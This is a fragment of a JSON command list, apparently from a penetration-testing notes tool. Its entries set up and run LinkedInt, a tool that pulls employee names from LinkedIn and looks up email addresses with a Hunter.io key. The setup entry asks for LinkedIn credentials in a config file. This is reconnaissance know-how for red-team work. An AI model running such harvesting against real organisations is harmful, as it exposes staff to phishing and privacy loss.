      "cmd": "git clone https://github.com/vysecurity/LinkedInt\ncd LinkedInt\npip install -r requirements.txt\n\n1. Put in LinkedIn credentials in LinkedInt.cfg\n2. Put Hunter.io API key in LinkedInt.cfg"
    },
    {
      "id": "02da6bcd-848b-484c-b4cf-c4dc1ac948fb",
      "name": "Fetch people interactively",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "LinkedInt.py"
    }
  ]
}
